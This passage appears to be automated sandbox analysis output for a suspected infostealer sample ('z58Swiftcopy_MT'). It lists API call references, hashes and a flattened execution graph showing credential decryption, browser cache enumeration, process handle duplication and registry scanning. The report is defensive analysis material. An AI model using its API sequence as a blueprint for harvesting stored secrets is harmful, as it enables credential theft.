                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067210118.0000000033A86000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_33a70000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrcatlstrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1475610065-0
                                                                                                                                                                                                                                      • Opcode ID: 6ab25ab75d17c882dc74e788dc81a45f84b0664593e05e916463105779a060c0
                                                                                                                                                                                                                                      • Instruction ID: fb39915a402deb948a21720db4cf9366578faaf547f1f04a72ad2e58d29c4ac1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ab25ab75d17c882dc74e788dc81a45f84b0664593e05e916463105779a060c0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 42219536D00304ABDB049BE8DDC5EEE77F8EF88710F24441BE905AB281EB74A54697A5

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 33A7715C
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 33A7717F
                                                                                                                                                                                                                                        • Part of subcall function 33A756D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 33A75702
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 33A771A5
                                                                                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 33A771C7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.32067210118.0000000033A71000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067186886.0000000033A70000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067210118.0000000033A86000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_33a70000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1794362364-0
                                                                                                                                                                                                                                      • Opcode ID: 99928db140cd1a5a42ecadd91eb17474beb32ec7ce5c6cd7b84a6c96b11c3a03
                                                                                                                                                                                                                                      • Instruction ID: 3d41eaabf09dd3774752e28f3340e590e1a5a25bf726e195a2a61327acc07935
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 99928db140cd1a5a42ecadd91eb17474beb32ec7ce5c6cd7b84a6c96b11c3a03
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 050184B7A013157BA7121AFA5CC8D7B7A6DDEC2AA2354012FBD04D7214EE628C0383B0

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      control_flow_graph 312 33a7c7e6-33a7c7ed GetModuleHandleA 313 33a7c7ef-33a7c7fe call 33a7c803 312->313 314 33a7c82d 312->314 324 33a7c865 313->324 325 33a7c800-33a7c80b GetProcAddress 313->325 315 33a7c82f-33a7c833 314->315 317 33a7c835-33a7c83d GetModuleHandleA 315->317 318 33a7c872 call 33a7c877 315->318 321 33a7c83f-33a7c847 317->321 321->321 323 33a7c849-33a7c84c 321->323 323->315 326 33a7c84e-33a7c850 323->326 328 33a7c866-33a7c86e 324->328 325->314 327 33a7c80d-33a7c81a 325->327 329 33a7c856-33a7c85e 326->329 330 33a7c852-33a7c854 326->330 336 33a7c82c 327->336 337 33a7c81c-33a7c829 327->337 332 33a7c870 328->332 333 33a7c85f-33a7c860 GetProcAddress 329->333 330->333 332->323 333->324 336->314 337->336
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(33A7C7DD), ref: 33A7C7E6
                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,33A7C7DD), ref: 33A7C838
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 33A7C860
                                                                                                                                                                                                                                        • Part of subcall function 33A7C803: GetProcAddress.KERNEL32(00000000,33A7C7F4), ref: 33A7C804
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.32067210118.0000000033A71000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067186886.0000000033A70000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067210118.0000000033A86000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_33a70000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1646373207-0
                                                                                                                                                                                                                                      • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                                      • Instruction ID: 5e75e3aae60746f8cc65efb4c835e753accaa6b730efed7de7aa52eab87df11c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A3012E519453503CBB1046F40CC0AAA6F9C9F236A0F180BABEC4096693EAA4C102C3AA
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,33A71D66,00000000,00000000,?,33A75C88,33A71D66,00000000,00000000,00000000,?,33A75E85,00000006,FlsSetValue), ref: 33A75D13
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,33A75C88,33A71D66,00000000,00000000,00000000,?,33A75E85,00000006,FlsSetValue,33A7E190,FlsSetValue,00000000,00000364,?,33A75BC8), ref: 33A75D1F
                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,33A75C88,33A71D66,00000000,00000000,00000000,?,33A75E85,00000006,FlsSetValue,33A7E190,FlsSetValue,00000000), ref: 33A75D2D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.32067210118.0000000033A71000.00000040.00001000.00020000.00000000.sdmp, Offset: 33A70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067186886.0000000033A70000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.32067210118.0000000033A86000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_33a70000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3177248105-0
                                                                                                                                                                                                                                      • Opcode ID: 935b25bf1e37b2f390827cc6e805e4eb6dca23d4e8b956f5345f22bb43336277
                                                                                                                                                                                                                                      • Instruction ID: 22635e0946a00c4fac7f1d82f06c3d8a02e799bfb715a3072b7a13114e159078
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 935b25bf1e37b2f390827cc6e805e4eb6dca23d4e8b956f5345f22bb43336277
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BF01717A611322ABD7119AE8DCC8A46779CEF456E1B140725FD0AEB141DB20D803CAE0

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:6.7%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                                                                                                                                      Signature Coverage:3.2%
                                                                                                                                                                                                                                      Total number of Nodes:2000
                                                                                                                                                                                                                                      Total number of Limit Nodes:80
40b2cc 27 API calls 38616->38617 38618 4088c0 38617->38618 38619 409d1f 6 API calls 38618->38619 38620 4088d0 38619->38620 38621 40b2cc 27 API calls 38620->38621 38622 4088df 38621->38622 38623 409d1f 6 API calls 38622->38623 38624 4088ef 38623->38624 38625 40b2cc 27 API calls 38624->38625 38626 4088fe 38625->38626 38627 409d1f 6 API calls 38626->38627 38639 408953 38639->38367 38659 40b633 free 38658->38659 38660 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38659->38660 38661 413f00 Process32NextW 38660->38661 38662 413da5 OpenProcess 38661->38662 38663 413f17 CloseHandle 38661->38663 38664 413eb0 38662->38664 38665 413df3 memset 38662->38665 38663->38404 38664->38661 38667 413ebf free 38664->38667 38668 4099f4 3 API calls 38664->38668 39807 413f27 38665->39807 38667->38664 38668->38664 38669 413e37 GetModuleHandleW 38671 413e46 GetProcAddress 38669->38671 38672 413e1f 38669->38672 38671->38672 38672->38669 39812 413959 38672->39812 39828 413ca4 38672->39828 38674 413ea2 CloseHandle 38674->38664 38676 414c2e 17 API calls 38675->38676 38677 403eb7 38676->38677 38678 414c2e 17 API calls 38677->38678 38679 403ec5 38678->38679 38680 409d1f 6 API calls 38679->38680 38681 403ee2 38680->38681 38682 409d1f 6 API calls 38681->38682 38683 403efd 38682->38683 38684 409d1f 6 API calls 38683->38684 38685 403f15 38684->38685 38686 403af5 20 API calls 38685->38686 38687 403f29 38686->38687 38688 403af5 20 API calls 38687->38688 38689 403f3a 38688->38689 38690 40414f 33 API calls 38689->38690 38696 403f4f 38690->38696 38691 403faf 39842 40b1ab free free 38691->39842 38693 403f5b memset 38693->38696 38694 403fb7 38694->38340 38695 4099c6 2 API calls 38695->38696 38696->38691 38696->38693 38696->38695 38697 40a8ab 9 API calls 38696->38697 38697->38696 38699 414c2e 17 API calls 38698->38699 38700 403d26 38699->38700 38701 414c2e 17 API calls 38700->38701 38702 403d34 38701->38702 38703 409d1f 6 API calls 38702->38703 38704 403d51 38703->38704 38705 409d1f 6 API calls 
38704->38705 38706 403d6c 38705->38706 38707 409d1f 6 API calls 38706->38707 38708 403d84 38707->38708 38709 403af5 20 API calls 38708->38709 38710 403d98 38709->38710 38711 403af5 20 API calls 38710->38711 38712 403da9 38711->38712 38713 40414f 33 API calls 38712->38713 38718 403dbe 38713->38718 38714 403e1e 39843 40b1ab free free 38714->39843 38716 403dca memset 38716->38718 38717 403e26 38717->38355 38718->38714 38718->38716 38719 4099c6 2 API calls 38718->38719 38720 40a8ab 9 API calls 38718->38720 38719->38718 38720->38718 38722 414b81 9 API calls 38721->38722 38724 414c40 38722->38724 38723 414c73 memset 38726 414c94 38723->38726 38724->38723 39844 409cea 38724->39844 39847 414592 RegOpenKeyExW 38726->39847 38729 414c64 SHGetSpecialFolderPathW 38731 414d0b 38729->38731 38730 414cc1 38732 414cf4 wcscpy 38730->38732 39848 414bb0 wcscpy 38730->39848 38731->38347 38732->38731 38734 414cd2 39849 4145ac RegQueryValueExW 38734->39849 38736 414ce9 RegCloseKey 38736->38732 38738 409d62 38737->38738 38739 409d43 wcscpy 38737->38739 38738->38378 38740 409719 2 API calls 38739->38740 38741 409d51 wcscat 38740->38741 38741->38738 38743 40aebe FindClose 38742->38743 38744 40ae21 38743->38744 38745 4099c6 2 API calls 38744->38745 38746 40ae35 38745->38746 38747 409d1f 6 API calls 38746->38747 38748 40ae49 38747->38748 38748->38447 38750 40ade0 38749->38750 38753 40ae0f 38749->38753 38751 40ade7 wcscmp 38750->38751 38750->38753 38752 40adfe wcscmp 38751->38752 38751->38753 38752->38753 38753->38447 38755 40ae18 9 API calls 38754->38755 38760 4453c4 38755->38760 38756 40ae51 9 API calls 38756->38760 38757 4453f3 38759 40aebe FindClose 38757->38759 38758 40add4 2 API calls 38758->38760 38761 4453fe 38759->38761 38760->38756 38760->38757 38760->38758 38762 445403 254 API calls 38760->38762 38761->38447 38762->38760 38764 40ae7b FindNextFileW 38763->38764 38765 40ae5c FindFirstFileW 38763->38765 38766 40ae94 38764->38766 38767 40ae8f 38764->38767 38765->38766 38769 40aeb6 
38766->38769 38770 409d1f 6 API calls 38766->38770 38768 40aebe FindClose 38767->38768 38768->38766 38769->38447 38770->38769 38771->38332 38772->38311 38773->38407 38774->38388 38775->38388 38776->38421 38778 409c89 38777->38778 38778->38443 38779->38474 38781 413d39 38780->38781 38782 413d2f FreeLibrary 38780->38782 38783 40b633 free 38781->38783 38782->38781 38784 413d42 38783->38784 38785 40b633 free 38784->38785 38786 413d4a 38785->38786 38786->38301 38787->38304 38788->38357 38789->38371 38791 44db70 38790->38791 38792 40b6fc memset 38791->38792 38793 409c70 2 API calls 38792->38793 38794 40b732 wcsrchr 38793->38794 38795 40b743 38794->38795 38796 40b746 memset 38794->38796 38795->38796 38797 40b2cc 27 API calls 38796->38797 38798 40b76f 38797->38798 38799 409d1f 6 API calls 38798->38799 38800 40b783 38799->38800 39850 409b98 GetFileAttributesW 38800->39850 38802 40b792 38803 40b7c2 38802->38803 38804 409c70 2 API calls 38802->38804 39851 40bb98 38803->39851 38806 40b7a5 38804->38806 38808 40b2cc 27 API calls 38806->38808 38812 40b7b2 38808->38812 38809 40b837 CloseHandle 38811 40b83e memset 38809->38811 38810 40b817 38813 409a45 3 API calls 38810->38813 39884 40a6e6 WideCharToMultiByte 38811->39884 38815 409d1f 6 API calls 38812->38815 38816 40b827 CopyFileW 38813->38816 38815->38803 38816->38811 38817 40b866 38818 444432 121 API calls 38817->38818 38820 40b879 38818->38820 38819 40bad5 38822 40baeb 38819->38822 38823 40bade DeleteFileW 38819->38823 38820->38819 38821 40b273 27 API calls 38820->38821 38824 40b89a 38821->38824 38825 40b04b ??3@YAXPAX 38822->38825 38823->38822 38826 438552 134 API calls 38824->38826 38827 40baf3 38825->38827 38828 40b8a4 38826->38828 38827->38381 38829 40bacd 38828->38829 38831 4251c4 137 API calls 38828->38831 38830 443d90 111 API calls 38829->38830 38830->38819 38854 40b8b8 38831->38854 38832 40bac6 39894 424f26 123 API calls 38832->39894 38833 40b8bd memset 39885 425413 17 API calls 38833->39885 38836 425413 17 API calls 
38836->38854 38839 40a71b MultiByteToWideChar 38839->38854 38840 40a734 MultiByteToWideChar 38840->38854 38843 40b9b5 memcmp 38843->38854 38844 4099c6 2 API calls 38844->38854 38845 404423 38 API calls 38845->38854 38848 40bb3e memset memcpy 39895 40a734 MultiByteToWideChar 38848->39895 38849 4251c4 137 API calls 38849->38854 38851 40bb88 LocalFree 38851->38854 38854->38832 38854->38833 38854->38836 38854->38839 38854->38840 38854->38843 38854->38844 38854->38845 38854->38848 38854->38849 38855 40ba5f memcmp 38854->38855 39886 4253ef 16 API calls 38854->39886 39887 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38854->39887 39888 4253af 17 API calls 38854->39888 39889 4253cf 17 API calls 38854->39889 39890 447280 memset 38854->39890 39891 447960 memset memcpy memcpy memcpy 38854->39891 39892 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38854->39892 39893 447920 memcpy memcpy memcpy 38854->39893 38855->38854 38856->38383 38858 40aed1 38857->38858 38859 40aec7 FindClose 38857->38859 38858->38315 38859->38858 38861 4099d7 38860->38861 38862 4099da memcpy 38860->38862 38861->38862 38862->38366 38864 40b2cc 27 API calls 38863->38864 38865 44543f 38864->38865 38866 409d1f 6 API calls 38865->38866 38867 44544f 38866->38867 39979 409b98 GetFileAttributesW 38867->39979 38869 44545e 38870 445476 38869->38870 38871 40b6ef 253 API calls 38869->38871 38872 40b2cc 27 API calls 38870->38872 38871->38870 38873 445482 38872->38873 38874 409d1f 6 API calls 38873->38874 38875 445492 38874->38875 39980 409b98 GetFileAttributesW 38875->39980 38877 4454a1 38878 4454b9 38877->38878 38879 40b6ef 253 API calls 38877->38879 38878->38396 38879->38878 38880->38395 38881->38412 38882->38418 38883->38455 38884->38432 38885->38482 38886->38482 38887->38463 38888->38493 38889->38495 38890->38497 38892 414c2e 17 API calls 38891->38892 38893 40c2ae 38892->38893 38963 40c1d3 38893->38963 38898 40c3be 38915 40a8ab 38898->38915 38899 40afcf 2 API calls 38900 40c2fd FindFirstUrlCacheEntryW 38899->38900 
38901 40c3b6 38900->38901 38902 40c31e wcschr 38900->38902 38903 40b04b ??3@YAXPAX 38901->38903 38904 40c331 38902->38904 38905 40c35e FindNextUrlCacheEntryW 38902->38905 38903->38898 38907 40a8ab 9 API calls 38904->38907 38905->38902 38906 40c373 GetLastError 38905->38906 38908 40c3ad FindCloseUrlCache 38906->38908 38909 40c37e 38906->38909 38910 40c33e wcschr 38907->38910 38908->38901 38911 40afcf 2 API calls 38909->38911 38910->38905 38912 40c34f 38910->38912 38913 40c391 FindNextUrlCacheEntryW 38911->38913 38914 40a8ab 9 API calls 38912->38914 38913->38902 38913->38908 38914->38905 39172 40a97a 38915->39172 38918 40a8cc 38918->38504 38919 40a8d0 7 API calls 38919->38918 39177 40b1ab free free 38920->39177 38922 40c3dd 38923 40b2cc 27 API calls 38922->38923 38924 40c3e7 38923->38924 39178 414592 RegOpenKeyExW 38924->39178 38926 40c3f4 38927 40c50e 38926->38927 38928 40c3ff 38926->38928 38942 405337 38927->38942 38929 40a9ce 4 API calls 38928->38929 38930 40c418 memset 38929->38930 39179 40aa1d 38930->39179 38933 40c471 38935 40c47a _wcsupr 38933->38935 38934 40c505 RegCloseKey 38934->38927 38936 40a8d0 7 API calls 38935->38936 38937 40c498 38936->38937 38938 40a8d0 7 API calls 38937->38938 38939 40c4ac memset 38938->38939 38940 40aa1d 38939->38940 38941 40c4e4 RegEnumValueW 38940->38941 38941->38934 38941->38935 39181 405220 38942->39181 38946 4099c6 2 API calls 38945->38946 38947 40a714 _wcslwr 38946->38947 38948 40c634 38947->38948 39238 405361 38948->39238 38951 40c65c wcslen 39241 4053b6 39 API calls 38951->39241 38952 40c71d wcslen 38952->38513 38954 40c677 38955 40c713 38954->38955 39242 40538b 39 API calls 38954->39242 39244 4053df 39 API calls 38955->39244 38958 40c6a5 38958->38955 38959 40c6a9 memset 38958->38959 38960 40c6d3 38959->38960 39243 40c589 44 API calls 38960->39243 38962->38511 38964 40ae18 9 API calls 38963->38964 38970 40c210 38964->38970 38965 40ae51 9 API calls 38965->38970 38966 40c264 38967 40aebe FindClose 38966->38967 38969 40c26f 
38967->38969 38968 40add4 2 API calls 38968->38970 38975 40e5ed memset memset 38969->38975 38970->38965 38970->38966 38970->38968 38971 40c231 _wcsicmp 38970->38971 38972 40c1d3 35 API calls 38970->38972 38971->38970 38973 40c248 38971->38973 38972->38970 38988 40c084 22 API calls 38973->38988 38976 414c2e 17 API calls 38975->38976 38977 40e63f 38976->38977 38978 409d1f 6 API calls 38977->38978 38979 40e658 38978->38979 38989 409b98 GetFileAttributesW 38979->38989 38981 40e667 38982 40e680 38981->38982 38983 409d1f 6 API calls 38981->38983 38990 409b98 GetFileAttributesW 38982->38990 38983->38982 38985 40e68f 38986 40c2d8 38985->38986 38991 40e4b2 38985->38991 38986->38898 38986->38899 38988->38970 38989->38981 38990->38985 39012 40e01e 38991->39012 38993 40e593 38994 40e5b0 38993->38994 38995 40e59c DeleteFileW 38993->38995 38996 40b04b ??3@YAXPAX 38994->38996 38995->38994 38998 40e5bb 38996->38998 38997 40e521 38997->38993 39035 40e175 38997->39035 39000 40e5c4 CloseHandle 38998->39000 39001 40e5cc 38998->39001 39000->39001 39003 40b633 free 39001->39003 39002 40e573 39004 40e584 39002->39004 39005 40e57c CloseHandle 39002->39005 39006 40e5db 39003->39006 39078 40b1ab free free 39004->39078 39005->39004 39008 40b633 free 39006->39008 39009 40e5e3 39008->39009 39009->38986 39011 40e540 39011->39002 39055 40e2ab 39011->39055 39079 406214 39012->39079 39015 40e16b 39015->38997 39018 40afcf 2 API calls 39019 40e08d OpenProcess 39018->39019 39020 40e0a4 GetCurrentProcess DuplicateHandle 39019->39020 39024 40e152 39019->39024 39021 40e0d0 GetFileSize 39020->39021 39022 40e14a CloseHandle 39020->39022 39115 409a45 GetTempPathW 39021->39115 39022->39024 39023 40e160 39027 40b04b ??3@YAXPAX 39023->39027 39024->39023 39026 406214 22 API calls 39024->39026 39026->39023 39027->39015 39028 40e0ea 39118 4096dc CreateFileW 39028->39118 39030 40e0f1 CreateFileMappingW 39031 40e140 CloseHandle CloseHandle 39030->39031 39032 40e10b MapViewOfFile 39030->39032 39031->39022 39033 
40e13b CloseHandle 39032->39033 39034 40e11f WriteFile UnmapViewOfFile 39032->39034 39033->39031 39034->39033 39036 40e18c 39035->39036 39119 406b90 39036->39119 39039 40e1a7 memset 39045 40e1e8 39039->39045 39040 40e299 39151 4069a3 39040->39151 39046 40e283 39045->39046 39047 40dd50 _wcsicmp 39045->39047 39053 40e244 _snwprintf 39045->39053 39129 406e8f 39045->39129 39158 40742e 8 API calls 39045->39158 39159 40aae3 wcslen wcslen _memicmp 39045->39159 39160 406b53 SetFilePointerEx ReadFile 39045->39160 39048 40e291 39046->39048 39049 40e288 free 39046->39049 39047->39045 39050 40aa04 free 39048->39050 39049->39048 39050->39040 39054 40a8d0 7 API calls 39053->39054 39054->39045 39056 40e2c2 39055->39056 39057 406b90 11 API calls 39056->39057 39058 40e2d3 39057->39058 39059 40e4a0 39058->39059 39061 406e8f 13 API calls 39058->39061 39064 40e489 39058->39064 39067 40dd50 _wcsicmp 39058->39067 39073 40e3e0 memcpy 39058->39073 39074 40e3fb memcpy 39058->39074 39075 40e3b3 wcschr 39058->39075 39076 40e416 memcpy 39058->39076 39077 40e431 memcpy 39058->39077 39161 40dd50 _wcsicmp 39058->39161 39170 40742e 8 API calls 39058->39170 39171 406b53 SetFilePointerEx ReadFile 39058->39171 39060 4069a3 2 API calls 39059->39060 39062 40e4ab 39060->39062 39061->39058 39062->39011 39065 40aa04 free 39064->39065 39066 40e491 39065->39066 39066->39059 39068 40e497 free 39066->39068 39067->39058 39068->39059 39070 40e376 memset 39162 40aa29 39070->39162 39073->39058 39074->39058 39075->39058 39076->39058 39077->39058 39078->38993 39080 406294 CloseHandle 39079->39080 39081 406224 39080->39081 39082 4096c3 CreateFileW 39081->39082 39083 40622d 39082->39083 39084 406281 GetLastError 39083->39084 39085 40a2ef ReadFile 39083->39085 39087 40625a 39084->39087 39086 406244 39085->39086 39086->39084 39088 40624b 39086->39088 39087->39015 39090 40dd85 memset 39087->39090 39088->39087 39089 406777 19 API calls 39088->39089 39089->39087 39091 409bca GetModuleFileNameW 39090->39091 39092 40ddbe 
CreateFileW 39091->39092 39095 40ddf1 39092->39095 39093 40afcf ??2@YAPAXI ??3@YAXPAX 39093->39095 39094 41352f 9 API calls 39094->39095 39095->39093 39095->39094 39096 40de0b NtQuerySystemInformation 39095->39096 39097 40de3b CloseHandle GetCurrentProcessId 39095->39097 39096->39095 39098 40de54 39097->39098 39099 413d4c 46 API calls 39098->39099 39107 40de88 39099->39107 39100 40e00c 39101 413d29 free FreeLibrary 39100->39101 39102 40e014 39101->39102 39102->39015 39102->39018 39103 40dea9 _wcsicmp 39104 40dee7 OpenProcess 39103->39104 39105 40debd _wcsicmp 39103->39105 39104->39107 39105->39104 39106 40ded0 _wcsicmp 39105->39106 39106->39104 39106->39107 39107->39100 39107->39103 39108 40dfef CloseHandle 39107->39108 39109 40df78 39107->39109 39110 40df23 GetCurrentProcess DuplicateHandle 39107->39110 39113 40df8f CloseHandle 39107->39113 39108->39107 39109->39108 39109->39113 39114 40dfae _wcsicmp 39109->39114 39110->39107 39111 40df4c memset 39110->39111 39112 41352f 9 API calls 39111->39112 39112->39107 39113->39109 39114->39107 39114->39109 39116 409a74 GetTempFileNameW 39115->39116 39117 409a66 GetWindowsDirectoryW 39115->39117 39116->39028 39117->39116 39118->39030 39120 406bd5 39119->39120 39121 406bad 39119->39121 39123 4066bf free malloc memcpy free free 39120->39123 39128 406c0f 39120->39128 39121->39120 39122 406bba _wcsicmp 39121->39122 39122->39120 39122->39121 39124 406be5 39123->39124 39125 40afcf ??2@YAPAXI ??3@YAXPAX 39124->39125 39124->39128 39126 406bff 39125->39126 39127 4068bf SetFilePointerEx memcpy ReadFile ??2@YAPAXI ??3@YAXPAX 39126->39127 39127->39128 39128->39039 39128->39040 39131 406ed1 39129->39131 39130 407424 39130->39045 39131->39130 39132 40b633 free 39131->39132 39140 406f4e 39132->39140 39133 406f73 memset 39133->39140 39134 407080 free 39134->39140 39135 40718b 39137 4069df memcpy 39135->39137 39149 40730b 39135->39149 39136 4099f4 malloc memcpy free 39136->39140 39150 4071f1 39137->39150 39138 4069df memcpy 39138->39140 
39139 4069df memcpy 39142 4070d4 39139->39142 39140->39133 39140->39134 39140->39136 39140->39138 39141 406aa2 memcpy 39140->39141 39140->39142 39143 406a10 memcpy 39140->39143 39141->39140 39142->39130 39142->39135 39142->39139 39145 40717b 39142->39145 39143->39140 39144 4069df memcpy 39144->39150 39146 4069df memcpy 39145->39146 39146->39135 39147 406c5a 6 API calls 39147->39149 39148 406c28 ??2@YAPAXI ??3@YAXPAX 39148->39149 39149->39130 39149->39147 39149->39148 39150->39144 39150->39149 39152 4069c4 ??3@YAXPAX 39151->39152 39153 4069af 39152->39153 39154 40b633 free 39153->39154 39155 4069ba 39154->39155 39156 40b04b ??3@YAXPAX 39155->39156 39157 4069c2 39156->39157 39157->39011 39158->39045 39159->39045 39160->39045 39161->39070 39163 40aa33 39162->39163 39164 40aa63 39162->39164 39165 40aa44 39163->39165 39166 40aa38 wcslen 39163->39166 39164->39058 39167 40a9ce malloc memcpy free free 39165->39167 39166->39165 39168 40aa4d 39167->39168 39168->39164 39169 40aa51 memcpy 39168->39169 39169->39164 39170->39058 39171->39058 39176 40a980 39172->39176 39173 40a8bb 39173->38918 39173->38919 39174 40a995 _wcsicmp 39174->39176 39175 40a99c wcscmp 39175->39176 39176->39173 39176->39174 39176->39175 39177->38922 39178->38926 39180 40aa23 RegEnumValueW 39179->39180 39180->38933 39180->38934 39182 405335 39181->39182 39183 40522a 39181->39183 39182->38513 39184 40b2cc 27 API calls 39183->39184 39185 405234 39184->39185 39186 40a804 8 API calls 39185->39186 39187 40523a 39186->39187 39226 40b273 39187->39226 39189 405248 _mbscpy _mbscat GetProcAddress 39190 40b273 27 API calls 39189->39190 39191 405279 39190->39191 39229 405211 GetProcAddress 39191->39229 39193 405282 39194 40b273 27 API calls 39193->39194 39195 40528f 39194->39195 39230 405211 GetProcAddress 39195->39230 39197 405298 39198 40b273 27 API calls 39197->39198 39199 4052a5 39198->39199 39231 405211 GetProcAddress 39199->39231 39201 4052ae 39202 40b273 27 API calls 39201->39202 39203 4052bb 39202->39203 39232 
405211 GetProcAddress 39203->39232 39205 4052c4 39206 40b273 27 API calls 39205->39206 39207 4052d1 39206->39207 39233 405211 GetProcAddress 39207->39233 39209 4052da 39210 40b273 27 API calls 39209->39210 39211 4052e7 39210->39211 39234 405211 GetProcAddress 39211->39234 39213 4052f0 39214 40b273 27 API calls 39213->39214 39215 4052fd 39214->39215 39235 405211 GetProcAddress 39215->39235 39217 405306 39218 40b273 27 API calls 39217->39218 39219 405313 39218->39219 39227 40b58d 27 API calls 39226->39227 39228 40b18c 39227->39228 39228->39189 39229->39193 39230->39197 39231->39201 39232->39205 39233->39209 39234->39213 39235->39217 39239 405220 39 API calls 39238->39239 39240 405369 39239->39240 39240->38951 39240->38952 39241->38954 39242->38958 39243->38955 39244->38952 39246 40440c FreeLibrary 39245->39246 39247 40436d 39246->39247 39248 40a804 8 API calls 39247->39248 39249 404377 39248->39249 39250 404383 39249->39250 39251 404405 39249->39251 39252 40b273 27 API calls 39250->39252 39251->38523 39251->38524 39251->38525 39253 40438d GetProcAddress 39252->39253 39254 40b273 27 API calls 39253->39254 39255 4043a7 GetProcAddress 39254->39255 39256 40b273 27 API calls 39255->39256 39257 4043ba GetProcAddress 39256->39257 39258 40b273 27 API calls 39257->39258 39259 4043ce GetProcAddress 39258->39259 39260 40b273 27 API calls 39259->39260 39261 4043e2 GetProcAddress 39260->39261 39262 4043f1 39261->39262 39263 4043f7 39262->39263 39264 40440c FreeLibrary 39262->39264 39263->39251 39264->39251 39266 404413 FreeLibrary 39265->39266 39267 40441e 39265->39267 39266->39267 39267->38540 39268->38536 39270 40447e 39269->39270 39271 40442e 39269->39271 39272 404485 CryptUnprotectData 39270->39272 39273 40449c 39270->39273 39274 40b2cc 27 API calls 39271->39274 39272->39273 39273->38536 39275 404438 39274->39275 39276 40a804 8 API calls 39275->39276 39277 40443e 39276->39277 39278 404445 39277->39278 39279 404467 39277->39279 39280 40b273 27 API calls 39278->39280 
